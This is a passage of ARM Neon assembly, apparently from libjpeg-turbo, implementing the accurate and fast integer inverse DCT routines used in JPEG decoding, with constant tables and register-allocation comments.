#define XFIX_0_899976223 d0[0]
#define XFIX_0_541196100 d0[1]
#define XFIX_2_562915447 d0[2]
#define XFIX_0_298631336_MINUS_0_899976223 d0[3]
#define XFIX_1_501321110_MINUS_0_899976223 d1[0]
#define XFIX_2_053119869_MINUS_2_562915447 d1[1]
#define XFIX_0_541196100_PLUS_0_765366865 d1[2]
#define XFIX_1_175875602 d1[3]
#define XFIX_1_175875602_MINUS_0_390180644 d2[0]
#define XFIX_0_541196100_MINUS_1_847759065 d2[1]
#define XFIX_3_072711026_MINUS_2_562915447 d2[2]
#define XFIX_1_175875602_MINUS_1_961570560 d2[3]
/* Constant table for jsimd_idct_islow_neon; entry order must match the
 * XFIX_* lane aliases above (first 8 shorts -> d0/d1, last 4 -> d2). */
.balign 16
jsimd_idct_islow_neon_consts:
.short FIX_0_899976223 /* d0[0] */
.short FIX_0_541196100 /* d0[1] */
.short FIX_2_562915447 /* d0[2] */
.short FIX_0_298631336_MINUS_0_899976223 /* d0[3] */
.short FIX_1_501321110_MINUS_0_899976223 /* d1[0] */
.short FIX_2_053119869_MINUS_2_562915447 /* d1[1] */
.short FIX_0_541196100_PLUS_0_765366865 /* d1[2] */
.short FIX_1_175875602 /* d1[3] */
/* reloadable constants */
.short FIX_1_175875602_MINUS_0_390180644 /* d2[0] */
.short FIX_0_541196100_MINUS_1_847759065 /* d2[1] */
.short FIX_3_072711026_MINUS_2_562915447 /* d2[2] */
.short FIX_1_175875602_MINUS_1_961570560 /* d2[3] */
asm_function jsimd_idct_islow_neon
DCT_TABLE .req r0
COEF_BLOCK .req r1
OUTPUT_BUF .req r2
OUTPUT_COL .req r3
TMP1 .req r0
TMP2 .req r1
TMP3 .req r2
TMP4 .req ip
ROW0L .req d16
ROW0R .req d17
ROW1L .req d18
ROW1R .req d19
ROW2L .req d20
ROW2R .req d21
ROW3L .req d22
ROW3R .req d23
ROW4L .req d24
ROW4R .req d25
ROW5L .req d26
ROW5R .req d27
ROW6L .req d28
ROW6R .req d29
ROW7L .req d30
ROW7R .req d31
/* Load and dequantize coefficients into Neon registers
* with the following allocation:
* 0 1 2 3 | 4 5 6 7
* ---------+--------
* 0 | d16 | d17 ( q8 )
* 1 | d18 | d19 ( q9 )
* 2 | d20 | d21 ( q10 )
* 3 | d22 | d23 ( q11 )
* 4 | d24 | d25 ( q12 )
* 5 | d26 | d27 ( q13 )
* 6 | d28 | d29 ( q14 )
* 7 | d30 | d31 ( q15 )
*/
adr ip, jsimd_idct_islow_neon_consts
vld1.16 {d16, d17, d18, d19}, [COEF_BLOCK, :128]!
vld1.16 {d0, d1, d2, d3}, [DCT_TABLE, :128]!
vld1.16 {d20, d21, d22, d23}, [COEF_BLOCK, :128]!
vmul.s16 q8, q8, q0
vld1.16 {d4, d5, d6, d7}, [DCT_TABLE, :128]!
vmul.s16 q9, q9, q1
vld1.16 {d24, d25, d26, d27}, [COEF_BLOCK, :128]!
vmul.s16 q10, q10, q2
vld1.16 {d0, d1, d2, d3}, [DCT_TABLE, :128]!
vmul.s16 q11, q11, q3
vld1.16 {d28, d29, d30, d31}, [COEF_BLOCK, :128]
vmul.s16 q12, q12, q0
vld1.16 {d4, d5, d6, d7}, [DCT_TABLE, :128]!
vmul.s16 q14, q14, q2
vmul.s16 q13, q13, q1
vld1.16 {d0, d1, d2, d3}, [ip, :128] /* load constants */
add ip, ip, #16
vmul.s16 q15, q15, q3
vpush {d8 - d15} /* save Neon registers */
/* 1-D IDCT, pass 1, left 4x8 half */
vadd.s16 d4, ROW7L, ROW3L
vadd.s16 d5, ROW5L, ROW1L
vmull.s16 q6, d4, XFIX_1_175875602_MINUS_1_961570560
vmlal.s16 q6, d5, XFIX_1_175875602
vmull.s16 q7, d4, XFIX_1_175875602
/* Check for the zero coefficients in the right 4x8 half */
push {r4, r5}
vmlal.s16 q7, d5, XFIX_1_175875602_MINUS_0_390180644
vsubl.s16 q3, ROW0L, ROW4L
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 1 * 8))]
vmull.s16 q2, ROW2L, XFIX_0_541196100
vmlal.s16 q2, ROW6L, XFIX_0_541196100_MINUS_1_847759065
orr r0, r4, r5
vmov q4, q6
vmlsl.s16 q6, ROW5L, XFIX_2_562915447
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 2 * 8))]
vmlal.s16 q6, ROW3L, XFIX_3_072711026_MINUS_2_562915447
vshl.s32 q3, q3, #13
orr r0, r0, r4
vmlsl.s16 q4, ROW1L, XFIX_0_899976223
orr r0, r0, r5
vadd.s32 q1, q3, q2
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 3 * 8))]
vmov q5, q7
vadd.s32 q1, q1, q6
orr r0, r0, r4
vmlsl.s16 q7, ROW7L, XFIX_0_899976223
orr r0, r0, r5
vmlal.s16 q7, ROW1L, XFIX_1_501321110_MINUS_0_899976223
vrshrn.s32 ROW1L, q1, #11
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 4 * 8))]
vsub.s32 q1, q1, q6
vmlal.s16 q5, ROW5L, XFIX_2_053119869_MINUS_2_562915447
orr r0, r0, r4
vmlsl.s16 q5, ROW3L, XFIX_2_562915447
orr r0, r0, r5
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW2L, XFIX_0_541196100_PLUS_0_765366865
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 5 * 8))]
vmlal.s16 q6, ROW6L, XFIX_0_541196100
vsub.s32 q3, q3, q2
orr r0, r0, r4
vrshrn.s32 ROW6L, q1, #11
orr r0, r0, r5
vadd.s32 q1, q3, q5
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 6 * 8))]
vsub.s32 q3, q3, q5
vaddl.s16 q5, ROW0L, ROW4L
orr r0, r0, r4
vrshrn.s32 ROW2L, q1, #11
orr r0, r0, r5
vrshrn.s32 ROW5L, q3, #11
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 7 * 8))]
vshl.s32 q5, q5, #13
vmlal.s16 q4, ROW7L, XFIX_0_298631336_MINUS_0_899976223
orr r0, r0, r4
vadd.s32 q2, q5, q6
orrs r0, r0, r5
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 0 * 8))]
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
orr r0, r4, r5
vsub.s32 q3, q1, q4
pop {r4, r5}
vrshrn.s32 ROW7L, q2, #11
vrshrn.s32 ROW3L, q5, #11
vrshrn.s32 ROW0L, q6, #11
vrshrn.s32 ROW4L, q3, #11
beq 3f /* Go to do some special handling for the sparse
right 4x8 half */
/* 1-D IDCT, pass 1, right 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vadd.s16 d10, ROW7R, ROW3R
vadd.s16 d8, ROW5R, ROW1R
/* Transpose left 4x8 half */
vtrn.16 ROW6L, ROW7L
vmull.s16 q6, d10, XFIX_1_175875602_MINUS_1_961570560
vmlal.s16 q6, d8, XFIX_1_175875602
vtrn.16 ROW2L, ROW3L
vmull.s16 q7, d10, XFIX_1_175875602
vmlal.s16 q7, d8, XFIX_1_175875602_MINUS_0_390180644
vtrn.16 ROW0L, ROW1L
vsubl.s16 q3, ROW0R, ROW4R
vmull.s16 q2, ROW2R, XFIX_0_541196100
vmlal.s16 q2, ROW6R, XFIX_0_541196100_MINUS_1_847759065
vtrn.16 ROW4L, ROW5L
vmov q4, q6
vmlsl.s16 q6, ROW5R, XFIX_2_562915447
vmlal.s16 q6, ROW3R, XFIX_3_072711026_MINUS_2_562915447
vtrn.32 ROW1L, ROW3L
vshl.s32 q3, q3, #13
vmlsl.s16 q4, ROW1R, XFIX_0_899976223
vtrn.32 ROW4L, ROW6L
vadd.s32 q1, q3, q2
vmov q5, q7
vadd.s32 q1, q1, q6
vtrn.32 ROW0L, ROW2L
vmlsl.s16 q7, ROW7R, XFIX_0_899976223
vmlal.s16 q7, ROW1R, XFIX_1_501321110_MINUS_0_899976223
vrshrn.s32 ROW1R, q1, #11
vtrn.32 ROW5L, ROW7L
vsub.s32 q1, q1, q6
vmlal.s16 q5, ROW5R, XFIX_2_053119869_MINUS_2_562915447
vmlsl.s16 q5, ROW3R, XFIX_2_562915447
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW2R, XFIX_0_541196100_PLUS_0_765366865
vmlal.s16 q6, ROW6R, XFIX_0_541196100
vsub.s32 q3, q3, q2
vrshrn.s32 ROW6R, q1, #11
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vaddl.s16 q5, ROW0R, ROW4R
vrshrn.s32 ROW2R, q1, #11
vrshrn.s32 ROW5R, q3, #11
vshl.s32 q5, q5, #13
vmlal.s16 q4, ROW7R, XFIX_0_298631336_MINUS_0_899976223
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vrshrn.s32 ROW7R, q2, #11
vrshrn.s32 ROW3R, q5, #11
vrshrn.s32 ROW0R, q6, #11
vrshrn.s32 ROW4R, q3, #11
/* Transpose right 4x8 half */
vtrn.16 ROW6R, ROW7R
vtrn.16 ROW2R, ROW3R
vtrn.16 ROW0R, ROW1R
vtrn.16 ROW4R, ROW5R
vtrn.32 ROW1R, ROW3R
vtrn.32 ROW4R, ROW6R
vtrn.32 ROW0R, ROW2R
vtrn.32 ROW5R, ROW7R
1: /* 1-D IDCT, pass 2 (normal variant), left 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vmull.s16 q6, ROW1R, XFIX_1_175875602 /* ROW5L <-> ROW1R */
vmlal.s16 q6, ROW1L, XFIX_1_175875602
vmlal.s16 q6, ROW3R, XFIX_1_175875602_MINUS_1_961570560 /* ROW7L <-> ROW3R */
vmlal.s16 q6, ROW3L, XFIX_1_175875602_MINUS_1_961570560
vmull.s16 q7, ROW3R, XFIX_1_175875602 /* ROW7L <-> ROW3R */
vmlal.s16 q7, ROW3L, XFIX_1_175875602
vmlal.s16 q7, ROW1R, XFIX_1_175875602_MINUS_0_390180644 /* ROW5L <-> ROW1R */
vmlal.s16 q7, ROW1L, XFIX_1_175875602_MINUS_0_390180644
vsubl.s16 q3, ROW0L, ROW0R /* ROW4L <-> ROW0R */
vmull.s16 q2, ROW2L, XFIX_0_541196100
vmlal.s16 q2, ROW2R, XFIX_0_541196100_MINUS_1_847759065 /* ROW6L <-> ROW2R */
vmov q4, q6
vmlsl.s16 q6, ROW1R, XFIX_2_562915447 /* ROW5L <-> ROW1R */
vmlal.s16 q6, ROW3L, XFIX_3_072711026_MINUS_2_562915447
vshl.s32 q3, q3, #13
vmlsl.s16 q4, ROW1L, XFIX_0_899976223
vadd.s32 q1, q3, q2
vmov q5, q7
vadd.s32 q1, q1, q6
vmlsl.s16 q7, ROW3R, XFIX_0_899976223 /* ROW7L <-> ROW3R */
vmlal.s16 q7, ROW1L, XFIX_1_501321110_MINUS_0_899976223
vshrn.s32 ROW1L, q1, #16
vsub.s32 q1, q1, q6
vmlal.s16 q5, ROW1R, XFIX_2_053119869_MINUS_2_562915447 /* ROW5L <-> ROW1R */
vmlsl.s16 q5, ROW3L, XFIX_2_562915447
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW2L, XFIX_0_541196100_PLUS_0_765366865
vmlal.s16 q6, ROW2R, XFIX_0_541196100 /* ROW6L <-> ROW2R */
vsub.s32 q3, q3, q2
vshrn.s32 ROW2R, q1, #16 /* ROW6L <-> ROW2R */
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vaddl.s16 q5, ROW0L, ROW0R /* ROW4L <-> ROW0R */
vshrn.s32 ROW2L, q1, #16
vshrn.s32 ROW1R, q3, #16 /* ROW5L <-> ROW1R */
vshl.s32 q5, q5, #13
vmlal.s16 q4, ROW3R, XFIX_0_298631336_MINUS_0_899976223 /* ROW7L <-> ROW3R */
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vshrn.s32 ROW3R, q2, #16 /* ROW7L <-> ROW3R */
vshrn.s32 ROW3L, q5, #16
vshrn.s32 ROW0L, q6, #16
vshrn.s32 ROW0R, q3, #16 /* ROW4L <-> ROW0R */
/* 1-D IDCT, pass 2, right 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vmull.s16 q6, ROW5R, XFIX_1_175875602
vmlal.s16 q6, ROW5L, XFIX_1_175875602 /* ROW5L <-> ROW1R */
vmlal.s16 q6, ROW7R, XFIX_1_175875602_MINUS_1_961570560
vmlal.s16 q6, ROW7L, XFIX_1_175875602_MINUS_1_961570560 /* ROW7L <-> ROW3R */
vmull.s16 q7, ROW7R, XFIX_1_175875602
vmlal.s16 q7, ROW7L, XFIX_1_175875602 /* ROW7L <-> ROW3R */
vmlal.s16 q7, ROW5R, XFIX_1_175875602_MINUS_0_390180644
vmlal.s16 q7, ROW5L, XFIX_1_175875602_MINUS_0_390180644 /* ROW5L <-> ROW1R */
vsubl.s16 q3, ROW4L, ROW4R /* ROW4L <-> ROW0R */
vmull.s16 q2, ROW6L, XFIX_0_541196100 /* ROW6L <-> ROW2R */
vmlal.s16 q2, ROW6R, XFIX_0_541196100_MINUS_1_847759065
vmov q4, q6
vmlsl.s16 q6, ROW5R, XFIX_2_562915447
vmlal.s16 q6, ROW7L, XFIX_3_072711026_MINUS_2_562915447 /* ROW7L <-> ROW3R */
vshl.s32 q3, q3, #13
vmlsl.s16 q4, ROW5L, XFIX_0_899976223 /* ROW5L <-> ROW1R */
vadd.s32 q1, q3, q2
vmov q5, q7
vadd.s32 q1, q1, q6
vmlsl.s16 q7, ROW7R, XFIX_0_899976223
vmlal.s16 q7, ROW5L, XFIX_1_501321110_MINUS_0_899976223 /* ROW5L <-> ROW1R */
vshrn.s32 ROW5L, q1, #16 /* ROW5L <-> ROW1R */
vsub.s32 q1, q1, q6
vmlal.s16 q5, ROW5R, XFIX_2_053119869_MINUS_2_562915447
vmlsl.s16 q5, ROW7L, XFIX_2_562915447 /* ROW7L <-> ROW3R */
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW6L, XFIX_0_541196100_PLUS_0_765366865 /* ROW6L <-> ROW2R */
vmlal.s16 q6, ROW6R, XFIX_0_541196100
vsub.s32 q3, q3, q2
vshrn.s32 ROW6R, q1, #16
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vaddl.s16 q5, ROW4L, ROW4R /* ROW4L <-> ROW0R */
vshrn.s32 ROW6L, q1, #16 /* ROW6L <-> ROW2R */
vshrn.s32 ROW5R, q3, #16
vshl.s32 q5, q5, #13
vmlal.s16 q4, ROW7R, XFIX_0_298631336_MINUS_0_899976223
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vshrn.s32 ROW7R, q2, #16
vshrn.s32 ROW7L, q5, #16 /* ROW7L <-> ROW3R */
vshrn.s32 ROW4L, q6, #16 /* ROW4L <-> ROW0R */
vshrn.s32 ROW4R, q3, #16
2: /* Descale to 8-bit and range limit */
vqrshrn.s16 d16, q8, #2
vqrshrn.s16 d17, q9, #2
vqrshrn.s16 d18, q10, #2
vqrshrn.s16 d19, q11, #2
vpop {d8 - d15} /* restore Neon registers */
vqrshrn.s16 d20, q12, #2
/* Transpose the final 8-bit samples and do signed->unsigned conversion */
vtrn.16 q8, q9
vqrshrn.s16 d21, q13, #2
vqrshrn.s16 d22, q14, #2
vmov.u8 q0, #(CENTERJSAMPLE)
vqrshrn.s16 d23, q15, #2
vtrn.8 d16, d17
vtrn.8 d18, d19
vadd.u8 q8, q8, q0
vadd.u8 q9, q9, q0
vtrn.16 q10, q11
/* Store results to the output buffer */
ldmia OUTPUT_BUF!, {TMP1, TMP2}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
vst1.8 {d16}, [TMP1]
vtrn.8 d20, d21
vst1.8 {d17}, [TMP2]
ldmia OUTPUT_BUF!, {TMP1, TMP2}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
vst1.8 {d18}, [TMP1]
vadd.u8 q10, q10, q0
vst1.8 {d19}, [TMP2]
ldmia OUTPUT_BUF, {TMP1, TMP2, TMP3, TMP4}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
add TMP3, TMP3, OUTPUT_COL
add TMP4, TMP4, OUTPUT_COL
vtrn.8 d22, d23
vst1.8 {d20}, [TMP1]
vadd.u8 q11, q11, q0
vst1.8 {d21}, [TMP2]
vst1.8 {d22}, [TMP3]
vst1.8 {d23}, [TMP4]
bx lr
3: /* Left 4x8 half is done, right 4x8 half contains mostly zeros */
/* Transpose left 4x8 half */
vtrn.16 ROW6L, ROW7L
vtrn.16 ROW2L, ROW3L
vtrn.16 ROW0L, ROW1L
vtrn.16 ROW4L, ROW5L
vshl.s16 ROW0R, ROW0R, #2 /* PASS1_BITS */
vtrn.32 ROW1L, ROW3L
vtrn.32 ROW4L, ROW6L
vtrn.32 ROW0L, ROW2L
vtrn.32 ROW5L, ROW7L
cmp r0, #0
beq 4f /* Right 4x8 half has all zeros, go to 'sparse' second
pass */
/* Only row 0 is non-zero for the right 4x8 half */
vdup.s16 ROW1R, ROW0R[1]
vdup.s16 ROW2R, ROW0R[2]
vdup.s16 ROW3R, ROW0R[3]
vdup.s16 ROW4R, ROW0R[0]
vdup.s16 ROW5R, ROW0R[1]
vdup.s16 ROW6R, ROW0R[2]
vdup.s16 ROW7R, ROW0R[3]
vdup.s16 ROW0R, ROW0R[0]
b 1b /* Go to 'normal' second pass */
4: /* 1-D IDCT, pass 2 (sparse variant with zero rows 4-7), left 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vmull.s16 q6, ROW1L, XFIX_1_175875602
vmlal.s16 q6, ROW3L, XFIX_1_175875602_MINUS_1_961570560
vmull.s16 q7, ROW3L, XFIX_1_175875602
vmlal.s16 q7, ROW1L, XFIX_1_175875602_MINUS_0_390180644
vmull.s16 q2, ROW2L, XFIX_0_541196100
vshll.s16 q3, ROW0L, #13
vmov q4, q6
vmlal.s16 q6, ROW3L, XFIX_3_072711026_MINUS_2_562915447
vmlsl.s16 q4, ROW1L, XFIX_0_899976223
vadd.s32 q1, q3, q2
vmov q5, q7
vmlal.s16 q7, ROW1L, XFIX_1_501321110_MINUS_0_899976223
vadd.s32 q1, q1, q6
vadd.s32 q6, q6, q6
vmlsl.s16 q5, ROW3L, XFIX_2_562915447
vshrn.s32 ROW1L, q1, #16
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW2L, XFIX_0_541196100_PLUS_0_765366865
vsub.s32 q3, q3, q2
vshrn.s32 ROW2R, q1, #16 /* ROW6L <-> ROW2R */
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vshll.s16 q5, ROW0L, #13
vshrn.s32 ROW2L, q1, #16
vshrn.s32 ROW1R, q3, #16 /* ROW5L <-> ROW1R */
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vshrn.s32 ROW3R, q2, #16 /* ROW7L <-> ROW3R */
vshrn.s32 ROW3L, q5, #16
vshrn.s32 ROW0L, q6, #16
vshrn.s32 ROW0R, q3, #16 /* ROW4L <-> ROW0R */
/* 1-D IDCT, pass 2 (sparse variant with zero rows 4-7), right 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vmull.s16 q6, ROW5L, XFIX_1_175875602
vmlal.s16 q6, ROW7L, XFIX_1_175875602_MINUS_1_961570560
vmull.s16 q7, ROW7L, XFIX_1_175875602
vmlal.s16 q7, ROW5L, XFIX_1_175875602_MINUS_0_390180644
vmull.s16 q2, ROW6L, XFIX_0_541196100
vshll.s16 q3, ROW4L, #13
vmov q4, q6
vmlal.s16 q6, ROW7L, XFIX_3_072711026_MINUS_2_562915447
vmlsl.s16 q4, ROW5L, XFIX_0_899976223
vadd.s32 q1, q3, q2
vmov q5, q7
vmlal.s16 q7, ROW5L, XFIX_1_501321110_MINUS_0_899976223
vadd.s32 q1, q1, q6
vadd.s32 q6, q6, q6
vmlsl.s16 q5, ROW7L, XFIX_2_562915447
vshrn.s32 ROW5L, q1, #16 /* ROW5L <-> ROW1R */
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW6L, XFIX_0_541196100_PLUS_0_765366865
vsub.s32 q3, q3, q2
vshrn.s32 ROW6R, q1, #16
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vshll.s16 q5, ROW4L, #13
vshrn.s32 ROW6L, q1, #16 /* ROW6L <-> ROW2R */
vshrn.s32 ROW5R, q3, #16
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vshrn.s32 ROW7R, q2, #16
vshrn.s32 ROW7L, q5, #16 /* ROW7L <-> ROW3R */
vshrn.s32 ROW4L, q6, #16 /* ROW4L <-> ROW0R */
vshrn.s32 ROW4R, q3, #16
b 2b /* Go to epilogue */
.unreq DCT_TABLE
.unreq COEF_BLOCK
.unreq OUTPUT_BUF
.unreq OUTPUT_COL
.unreq TMP1
.unreq TMP2
.unreq TMP3
.unreq TMP4
.unreq ROW0L
.unreq ROW0R
.unreq ROW1L
.unreq ROW1R
.unreq ROW2L
.unreq ROW2R
.unreq ROW3L
.unreq ROW3R
.unreq ROW4L
.unreq ROW4R
.unreq ROW5L
.unreq ROW5R
.unreq ROW6L
.unreq ROW6R
.unreq ROW7L
.unreq ROW7R
/*****************************************************************************/
/*
* jsimd_idct_ifast_neon
*
* This function contains a fast, not so accurate integer implementation of
* the inverse DCT (Discrete Cosine Transform). It uses the same calculations
* and produces exactly the same output as IJG's original 'jpeg_idct_ifast'
* function from jidctfst.c
*
* Normally a 1-D AAN DCT needs 5 multiplications and 29 additions.
* In the Arm Neon case, however, some extra additions are required because
* the VQDMULH instruction cannot handle constants larger than 1. Expressions
* like "x * 1.082392200" therefore have to be converted to
* "x * 0.082392200 + x", which introduces an extra addition. Overall, there
* are 6 extra additions per 1-D IDCT pass, for a total of 5 VQDMULH and
* 35 VADD/VSUB instructions.
*/
#define XFIX_1_082392200 d0[0]
#define XFIX_1_414213562 d0[1]
#define XFIX_1_847759065 d0[2]
#define XFIX_2_613125930 d0[3]
.balign 16
jsimd_idct_ifast_neon_consts:
.short (277 * 128 - 256 * 128) /* XFIX_1_082392200 */
.short (362 * 128 - 256 * 128) /* XFIX_1_414213562 */
.short (473 * 128 - 256 * 128) /* XFIX_1_847759065 */
.short (669 * 128 - 512 * 128) /* XFIX_2_613125930 */
asm_function jsimd_idct_ifast_neon
DCT_TABLE .req r0
COEF_BLOCK .req r1
OUTPUT_BUF .req r2
OUTPUT_COL .req r3
TMP1 .req r0
TMP2 .req r1
TMP3 .req r2
TMP4 .req ip
/* Load and dequantize coefficients into Neon registers
* with the following allocation:
* 0 1 2 3 | 4 5 6 7
* ---------+--------
* 0 | d16 | d17 ( q8 )
* 1 | d18 | d19 ( q9 )
* 2 | d20 | d21 ( q10 )
* 3 | d22 | d23 ( q11 )
* 4 | d24 | d25 ( q12 )
* 5 | d26 | d27 ( q13 )
* 6 | d28 | d29 ( q14 )
* 7 | d30 | d31 ( q15 )
*/
adr ip, jsimd_idct_ifast_neon_consts
vld1.16 {d16, d17, d18, d19}, [COEF_BLOCK, :128]!
vld1.16 {d0, d1, d2, d3}, [DCT_TABLE, :128]!
vld1.16 {d20, d21, d22, d23}, [COEF_BLOCK, :128]!
vmul.s16 q8, q8, q0
vld1.16 {d4, d5, d6, d7}, [DCT_TABLE, :128]!
vmul.s16 q9, q9, q1
vld1.16 {d24, d25, d26, d27}, [COEF_BLOCK, :128]!
vmul.s16 q10, q10, q2
vld1.16 {d0, d1, d2, d3}, [DCT_TABLE, :128]!
vmul.s16 q11, q11, q3
vld1.16 {d28, d29, d30, d31}, [COEF_BLOCK, :128]
vmul.s16 q12, q12, q0
vld1.16 {d4, d5, d6, d7}, [DCT_TABLE, :128]!
vmul.s16 q14, q14, q2
vmul.s16 q13, q13, q1
vld1.16 {d0}, [ip, :64] /* load constants */
vmul.s16 q15, q15, q3
vpush {d8 - d13} /* save Neon registers */
/* 1-D IDCT, pass 1 */
vsub.s16 q2, q10, q14
vadd.s16 q14, q10, q14
vsub.s16 q1, q11, q13
vadd.s16 q13, q11, q13
vsub.s16 q5, q9, q15
vadd.s16 q15, q9, q15
vqdmulh.s16 q4, q2, XFIX_1_414213562
vqdmulh.s16 q6, q1, XFIX_2_613125930
vadd.s16 q3, q1, q1
vsub.s16 q1, q5, q1
vadd.s16 q10, q2, q4
vqdmulh.s16 q4, q1, XFIX_1_847759065
vsub.s16 q2, q15, q13
vadd.s16 q3, q3, q6
vqdmulh.s16 q6, q2, XFIX_1_414213562
vadd.s16 q1, q1, q4
vqdmulh.s16 q4, q5, XFIX_1_082392200
vsub.s16 q10, q10, q14
vadd.s16 q2, q2, q6
vsub.s16 q6, q8, q12
vadd.s16 q12, q8, q12
vadd.s16 q9, q5, q4
vadd.s16 q5, q6, q10
vsub.s16 q10, q6, q10
vadd.s16 q6, q15, q13
vadd.s16 q8, q12, q14
vsub.s16 q3, q6, q3
vsub.s16 q12, q12, q14
vsub.s16 q3, q3, q1
vsub.s16 q1, q9, q1
vadd.s16 q2, q3, q2
vsub.s16 q15, q8, q6
vadd.s16 q1, q1, q2
vadd.s16 q8, q8, q6
vadd.s16 q14, q5, q3
vsub.s16 q9, q5, q3
vsub.s16 q13, q10, q2
vadd.s16 q10, q10, q2
/* Transpose */
vtrn.16 q8, q9
vsub.s16 q11, q12, q1
vtrn.16 q14, q15
vadd.s16 q12, q12, q1
vtrn.16 q10, q11
vtrn.16 q12, q13
vtrn.32 q9, q11
vtrn.32 q12, q14
vtrn.32 q8, q10
vtrn.32 q13, q15
vswp d28, d21
vswp d26, d19
/* 1-D IDCT, pass 2 */
vsub.s16 q2, q10, q14
vswp d30, d23
vadd.s16 q14, q10, q14
vswp d24, d17
vsub.s16 q1, q11, q13
vadd.s16 q13, q11, q13
vsub.s16 q5, q9, q15
vadd.s16 q15, q9, q15
vqdmulh.s16 q4, q2, XFIX_1_414213562
vqdmulh.s16 q6, q1, XFIX_2_613125930
vadd.s16 q3, q1, q1
vsub.s16 q1, q5, q1
vadd.s16 q10, q2, q4
vqdmulh.s16 q4, q1, XFIX_1_847759065
vsub.s16 q2, q15, q13
vadd.s16 q3, q3, q6
vqdmulh.s16 q6, q2, XFIX_1_414213562
vadd.s16 q1, q1, q4
vqdmulh.s16 q4, q5, XFIX_1_082392200
vsub.s16 q10, q10, q14
vadd.s16 q2, q2, q6
vsub.s16 q6, q8, q12
vadd.s16 q12, q8, q12
vadd.s16 q9, q5, q4
vadd.s16 q5, q6, q10
vsub.s16 q10, q6, q10
vadd.s16 q6, q15, q13
vadd.s16 q8, q12, q14
vsub.s16 q3, q6, q3
vsub.s16 q12, q12, q14
vsub.s16 q3, q3, q1
vsub.s16 q1, q9, q1
vadd.s16 q2, q3, q2
vsub.s16 q15, q8, q6
vadd.s16 q1, q1, q2
vadd.s16 q8, q8, q6
vadd.s16 q14, q5, q3
vsub.s16 q9, q5, q3
vsub.s16 q13, q10, q2
vpop {d8 - d13} /* restore Neon registers */
vadd.s16 q10, q10, q2
vsub.s16 q11, q12, q1
vadd.s16 q12, q12, q1
/* Descale to 8-bit and range limit */
vmov.u8 q0, #0x80
vqshrn.s16 d16, q8, #5
vqshrn.s16 d17, q9, #5
vqshrn.s16 d18, q10, #5
vqshrn.s16 d19, q11, #5
vqshrn.s16 d20, q12, #5
vqshrn.s16 d21, q13, #5
vqshrn.s16 d22, q14, #5
vqshrn.s16 d23, q15, #5
vadd.u8 q8, q8, q0
vadd.u8 q9, q9, q0
vadd.u8 q10, q10, q0
vadd.u8 q11, q11, q0
/* Transpose the final 8-bit samples */
vtrn.16 q8, q9
vtrn.16 q10, q11
vtrn.32 q8, q10
vtrn.32 q9, q11
vtrn.8 d16, d17
vtrn.8 d18, d19
/* Store results to the output buffer */
ldmia OUTPUT_BUF!, {TMP1, TMP2}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
vst1.8 {d16}, [TMP1]
vst1.8 {d17}, [TMP2]
ldmia OUTPUT_BUF!, {TMP1, TMP2}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
vst1.8 {d18}, [TMP1]
vtrn.8 d20, d21
vst1.8 {d19}, [TMP2]
ldmia OUTPUT_BUF, {TMP1, TMP2, TMP3, TMP4}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
add TMP3, TMP3, OUTPUT_COL
add TMP4, TMP4, OUTPUT_COL
vst1.8 {d20}, [TMP1]
vtrn.8 d22, d23
vst1.8 {d21}, [TMP2]
vst1.8 {d22}, [TMP3]
vst1.8 {d23}, [TMP4]
bx lr
.unreq DCT_TABLE
.unreq COEF_BLOCK
.unreq OUTPUT_BUF
.unreq OUTPUT_COL
.unreq TMP1
.unreq TMP2
.unreq TMP3
.unreq TMP4
/*****************************************************************************/
/*
* jsimd_extrgb_ycc_convert_neon
* jsimd_extbgr_ycc_convert_neon
* jsimd_extrgbx_ycc_convert_neon
* jsimd_extbgrx_ycc_convert_neon
